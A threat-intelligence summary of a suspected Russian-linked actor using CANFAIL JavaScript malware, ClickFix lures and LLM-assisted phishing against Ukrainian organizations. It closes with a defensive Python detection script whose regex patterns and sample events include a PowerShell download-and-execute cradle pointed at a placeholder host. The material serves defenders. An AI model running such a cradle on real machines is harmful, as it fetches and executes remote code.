Full Report
Attacks targeting Ukrainian organizations with malware known as CANFAIL have been attributed to a previously undocumented threat actor. Google Threat Intelligence Group (GTIG) described the group as possibly affiliated with Russian intelligence services. The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and
Analysis Summary
# Threat Actor: Unnamed (Suspected Russian Intelligence-Affiliated)
## Attribution & Identity
* **Identification:** A previously undocumented threat actor first reported by Google Threat Intelligence Group (GTIG) in February 2026.
* **Aliases:** Currently associated with the campaign name "PhantomCaptcha."
* **Associations:** Assessed by GTIG to be possibly affiliated with Russian intelligence services. SentinelOne SentinelLABS has also tracked components of this actor's activity.
## Activity Summary
The actor is characterized as less sophisticated than prominent Russian APTs but increasingly effective through the use of AI. Recent operations include:
* **CANFAIL Malware Attacks:** Targeting Ukrainian regional and national government entities using custom JavaScript-based malware.
* **PhantomCaptcha Campaign (Oct 2025):** Phishing attacks targeting Ukraine war relief efforts using "ClickFix" social engineering tactics to deliver a WebSocket-based trojan.
* **Energy Sector Impersonation:** Sophisticated phishing campaigns impersonating Ukrainian and Romanian energy companies to harvest credentials and gain unauthorized access to email accounts.
## Tactics, Techniques & Procedures
* **AI-Enhanced Operations:** Utilization of Large Language Models (LLMs) to generate convincing social engineering lures, conduct target reconnaissance, and troubleshoot C2 infrastructure/post-compromise technical issues.
* **Phishing & Social Engineering:** Masquerading as legitimate energy organizations and humanitarian aid groups.
* **ClickFix Tactics:** Directing victims to fake pages that instruct them to copy, paste and run a command themselves (for example to "fix" a viewing problem), so the user's own action, not an exploit, starts the infection chain.
* **Evasion & Obfuscation:** Use of double extensions (e.g., `.pdf.js`) so a script appears to be a document, and display of a fake "error" message once the script runs to explain away the missing document and mask the malware's execution.
* **Targeted Credential Harvesting:** Email address lists tailored to specific industries and regions, giving the credential-phishing pages high-precision targeting.
## Targeting
* **Sectors:** Defense, military, government, energy, aerospace, manufacturing (with military/drone ties), nuclear/chemical research, and international humanitarian/conflict monitoring organizations.
* **Geography:** Primarily Ukraine; extending to Romania and Moldova.
* **Victims:** Ukrainian regional and national governments, war relief organizations, and unnamed Romanian/Moldovan firms.
## Tools & Infrastructure
* **CANFAIL:** Obfuscated JavaScript that, when run, executes a PowerShell script which downloads a dropper that runs only in memory, leaving no payload file on disk.
* **PhantomCaptcha:** Infrastructure used to host fake pages and deliver a WebSocket-based trojan.
* **Lure Delivery:** Google Drive links (`drive.google[.]com`) pointing to RAR archives containing malicious scripts.
* **Malware Extensions:** `.pdf.js` (JavaScript masquerading as PDF).
## Implications
While initially deemed less resourced than counterparts like APT28 or Sandworm, this actor’s adoption of LLMs indicates a "leveling up" of lower-tier threat actors. By automating reconnaissance and lure creation, the group has successfully scaled operations and improved the quality of their social engineering, making them a significant threat to the Eastern European Defense Industrial Base (DIB).
## Mitigations
* **Email Security:** Block or quarantine script attachments and double-extension names such as `.pdf.js`, and inspect RAR archives linked from cloud storage providers like Google Drive, since the lures arrive as links rather than attachments.
* **User Training:** Educate employees on "ClickFix" style social engineering where a website asks them to execute commands or scripts to "fix" a viewing problem.
* **Endpoint Defense:** Deploy EDR capable of flagging script interpreters launching PowerShell, PowerShell that downloads and executes payloads without writing them to disk, and `.js` files opened from download or archive-extraction locations.
* **Infrastructure Monitoring:** Monitor for outbound WebSocket connections to unknown hosts (the PhantomCaptcha trojan uses WebSocket-based C2) and for lookalike domains impersonating regional energy companies, which this actor uses for its credential-phishing pages.
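As an added example (not code from the GTIG or SentinelLABS reporting, and not part of this page), the script below turns two of the TTPs above into triage logic that the Email Security and Endpoint Defense mitigations call for: a filename check for the double-extension trick (`.pdf.js` and similar) and a process-creation check for the JavaScript-to-PowerShell in-memory download chain. It assumes the `.js` lure runs under Windows Script Host (wscript.exe/cscript.exe), which is the default handler for `.js` on Windows but is not stated by the report, and that a ClickFix-pasted command shows explorer.exe or cmd.exe as its parent, which is the common ClickFix shape rather than a detail from the page. The sample filenames and process events are constructed for this example (198.51.100.10 is a documentation address), and the function names `is_double_extension`, `classify_process` and `triage` are mine.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Final extensions Windows executes as a script when double-clicked.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".cmd", ".bat"}
# Decoy "document" extensions an attacker places before the real one (e.g. `.pdf.js`).
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt", ".jpg", ".png"}

# Script hosts. Assumption: the .js lure runs under Windows Script Host; the
# report only says the JavaScript executes a PowerShell script.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of "download and run in memory" stagers.
DOWNLOAD_EXEC = re.compile(
    r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|frombase64string|-enc(?:odedcommand)?\b",
    re.IGNORECASE,
)
# Flags a pasted one-liner uses to stay out of sight.
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased final path component, accepting / or \\ separators."""
    return path.lower().replace("\\", "/").rsplit("/", 1)[-1]


def is_double_extension(filename: str) -> bool:
    """True for names such as 'invoice.pdf.js': a decoy document extension
    immediately followed by an executable script extension."""
    parts = _basename(filename).split(".")
    if len(parts) < 3:
        return False
    return ("." + parts[-1]) in SCRIPT_EXTENSIONS and ("." + parts[-2]) in DECOY_EXTENSIONS


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def classify_process(ev: ProcessEvent) -> Optional[str]:
    """Return an alert name for the script-to-PowerShell chain, or None."""
    child = _basename(ev.image)
    parent = _basename(ev.parent_image)
    if child not in POWERSHELL:
        return None
    downloader = bool(DOWNLOAD_EXEC.search(ev.command_line))
    if parent in SCRIPT_HOSTS and downloader:
        return "script-host-to-powershell-downloader"
    # ClickFix: the victim pastes the command into the Run dialog or a console,
    # so the parent is explorer.exe/cmd.exe (assumption, see lead-in).
    if parent in {"explorer.exe", "cmd.exe"} and downloader and HIDDEN.search(ev.command_line):
        return "clickfix-pasted-powershell-downloader"
    return None


def triage(filenames: List[str], events: List[ProcessEvent]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Run both checks; return (flagged filenames, [(alert name, command line)])."""
    flagged = [f for f in filenames if is_double_extension(f)]
    alerts = [(classify_process(e), e.command_line) for e in events]
    return flagged, [(a, c) for a, c in alerts if a]


# Constructed sample input: names as they might appear inside an extracted RAR,
# and process-creation events as an EDR would record them.
SAMPLE_FILENAMES = ["Звіт_2025.pdf.js", "contract.docx", "scan.jpg.vbs", "notes.txt", "archive.tar.gz"]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS,
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/s')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell -w hidden -EncodedCommand SQBFAFgAIAAoAE4A"),  # placeholder blob, constructed
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcessEvent(r"C:\Program Files\Git\bin\bash.exe", PS, "powershell -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    flagged, alerts = triage(SAMPLE_FILENAMES, SAMPLE_EVENTS)
    for f in flagged:
        print("double-extension:", f)
    for name, cmd in alerts:
        print(f"{name}: {cmd}")
```

The filename check is deliberately narrow (decoy extension followed by script extension) so that legitimate compound names such as `archive.tar.gz` are not flagged; widen `DECOY_EXTENSIONS` to match whatever your users actually receive. The process check keys on the parent/child pair first and only then on command-line content, which keeps ordinary administrative PowerShell (a scheduled `-File backup.ps1`, a `Get-Date` from a shell) out of the alert queue.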